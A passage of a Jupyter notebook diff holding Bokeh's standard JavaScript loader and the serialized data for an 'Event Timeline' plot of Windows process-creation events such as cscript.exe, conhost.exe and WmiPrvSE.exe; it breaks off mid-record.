(!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1298\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1298\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"db4824c4-17c4-4154-a05b-2641ad064898\" data-root-id=\"1383\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"33565bc6-ab96-43ca-8262-3e6b1568dca2\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1302\"},{\"id\":\"1334\"}]},\"id\":\"1383\",\"type\":\"Column\"},{\"attributes\":{},\"id\":\"1324\",\"type\":\"SaveTool\"},{\"attributes\":{\"fill_color\":{\"value\":\"#FDE724\"},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1359\",\"type\":\"Circle\"},{\"attributes\":{\"months\":[0,2,4,6,8,10]},\"id\":\"1419\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1323\",\"type\":\"ResetTool\"},{\"attributes\":{},\"id\":\"1391\",\"type\":\"AllLabels\"},{\"attributes\":{\"formatter\":{\"id\":\"1351\"},\"major_label_policy\":{\"id\":\"1391\"},\"ticker\":{\"id\":\"1346\"}},\"id\":\"1345\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1418\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1325\",\"type\":\"PanTool\"},{\"attributes\":{\"months\":[0,4,8]},\"id\":\"1420\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"text\":\"Event Timeline\"},\"id\":\"1303\",\"type\":\"Title\"},{\"attributes\":{\"data_source\":{\"id\":\"1300\"},\"glyph\":{\"id\":\"1359\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1360\"},\"view\":{\"id\":\"1362\"}},\"id\":\"1361\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"callback\":null,\"formatters\":{\"@TimeGenerated\":\"datetime\"},\"tooltips\":[[\"NewProcessName\",\"@NewProcessName\"],[\"ParentProcessName\",\"@ParentProcessName\"],[\"TimeGenerated\",\"@TimeGenerated{%F %T.%3N}\"]]},\"id\":\"1301\",\"type\":\"HoverTool\"},{\"attributes\":{\"below\":[{\"id\":\"1345\"},{\"id\":\"1350\"}],\"center\":[{\"id\":\"1348\"}],\"height\":120,\"renderers\":[{\"id\":\"1356\"},{\"id\":\"1361\"}],\"title\":{\"id\":\"1335\"},\"toolbar\":{\"id\":\"1349\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"1337\"},\"x_scale\":{\"id\":\"1341\"},\"y_range\":{\"id\":\"1339\"},\"y_scale\":{\"id\":\"1343\"}},\"id\":\"1334\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1421\",\"type\":\"MonthsTicker\"},{\"attributes\":{\"data_source\":{\"id\":\"1300\"},\"glyph\":{\"id\":\"1377\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1378\"},\"view\":{\"id\":\"1380\"}},\"id\":\"1379\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1378\",\"type\":\"Scatter\"},{\"attributes\":{},\"id\":\"1397\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"source\":{\"id\":\"1300\"}},\"id\":\"1380\",\"type\":\"CDSView\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#FDE724\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#FDE724\"},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1360\",\"type\":\"Circle\"},{\"attributes\":{\"data_source\":{\"id\":\"1299\"},\"glyph\":{\"id\":\"1371\"},\"hover_glyph\":null,\"muted_glyph\":null,\"nonselection_glyph\":{\"id\":\"1372\"},\"view\":{\"id\":\"1374\"}},\"id\":\"1373\",\"type\":\"GlyphRenderer\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1399\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{},\"id\":\"1422\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"1309\",\"type\":\"LinearScale\"},{\"attributes\":{\"source\":{\"id\":\"1300\"}},\"id\":\"1362\",\"type\":\"CDSView\"},{\"attributes\":{},\"id\":\"1394\",\"type\":\"Selection\"},{\"attributes\":{},\"id\":\"1395\",\"type\":\"UnionRenderers\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1301\"},{\"id\":\"1321\"},{\"id\":\"1322\"},{\"id\":\"1323\"},{\"id\":\"1324\"},{\"id\":\"1325\"}]},\"id\":\"1327\",\"type\":\"Toolbar\"},{\"attributes\":{},\"id\":\"1396\",\"type\":\"Selection\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"#440154\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"#440154\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\":\"y_index\"}},\"id\":\"1372\",\"type\":\"Scatter\"},{\"attributes\":{\"bottom_units\":\"screen\",\"fill_alpha\":0.5,\"fill_color\":\"lightgrey\",\"left_units\":\"screen\",\"level\":\"overlay\",\"line_alpha\":1.0,\"line_color\":\"black\",\"line_dash\":[4,4],\"line_width\":2,\"right_units\":\"screen\",\"syncable\":false,\"top_units\":\"screen\"},\"id\":\"1326\",\"type\":\"BoxAnnotation\"},{\"attributes\":{\"end\":1547530280011.0,\"start\":1547525311999.0},\"id\":\"1305\",\"type\":\"Range1d\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1398\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"click_policy\":\"hide\",\"items\":[{\"id\":\"1381\"},{\"id\":\"1375\"}],\"label_text_font_size\":\"8pt\",\"location\":\"center\"},\"id\":\"1382\",\"type\":\"Legend\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1401\",\"type\":\"DaysTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1364\"},\"x_range\":{\"id\":\"1305\"},\"y_range\":null},\"id\":\"1363\",\"type\":\"RangeTool\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1400\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"end\":1.5,\"start\":-0.5},\"id\":\"1307\",\"type\":\"Range1d\"},{\"attributes\":{\"days\":[1,4,7,10,13,16,19,22,25,28]},\"id\":\"1402\",\"type\":\"DaysTicker\"},{\"attributes\":{},\"id\":\"1341\",\"type\":\"LinearScale\"},{\"attributes\":{},\"id\":\"1343\",\"type\":\"LinearScale\"},{\"attributes\":{\"below\":[{\"id\":\"1313\"}],\"center\":[{\"id\":\"1316\"},{\"id\":\"1320\"}],\"height\":300,\"left\":[{\"id\":\"1317\"},{\"id\":\"1382\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"1373\"},{\"id\":\"1379\"}],\"title\":{\"id\":\"1303\"},\"toolbar\":{\"id\":\"1327\"},\"width\":900,\"x_range\":{\"id\":\"1305\"},\"x_scale\":{\"id\":\"1309\"},\"y_range\":{\"id\":\"1307\"},\"y_scale\":{\"id\":\"1311\"}},\"id\":\"1302\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"months\":[0,1,2,3,4,5,6,7,8,9,10,11]},\"id\":\"1405\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1389\",\"type\":\"AllLabels\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1411\"},{\"id\":\"1412\"},{\"id\":\"1413\"},{\"id\":\"1414\"},{\"id\":\"1415\"},{\"id\":\"1416\"},{\"id\":\"1417\"},{\"id\":\"1418\"},{\"id\":\"1419\"},{\"id\":\"1420\"},{\"id\":\"1421\"},{\"id\":\"1422\"}]},\"id\":\"1346\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"data\":{\"NewProcessName\":[\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\dllhost.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\Dism.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\Temp\\\\CC563BBE-\\nDE32-44D3-8E35-F3FC78E72E40\\\\DismHost.exe\",\"C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\"C:\\\\Windows\\\\WinSxS\\\\amd64_microsoft-windows-servicin\\ngstack_31bf3856ad364e35_10.0.14393.2602_none_7ee60\\n20e2207416d\\\\TiWorker.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\wermgr.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\svchost.exe\",\"C:\\\\Windows\\\\System32\\\\WerFault.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\WindowsAzure\\\\GuestAgent_2.7.41491.901_2019-01-1\\n4_202614\\\\CollectGuestLogs.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\n(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\MusNotification.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\taskhostw.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft Monitoring\\nAgent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\Nati\\nveDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Windows\\\\System32\\\\cmd.exe\",\"C:\\\\Windows\\\\System32\\\\conhost.exe\",\"C:\\\\Windows\\\\System32\\\\cscript.exe\",\"C:\\\\Program Files\\\\Microsoft 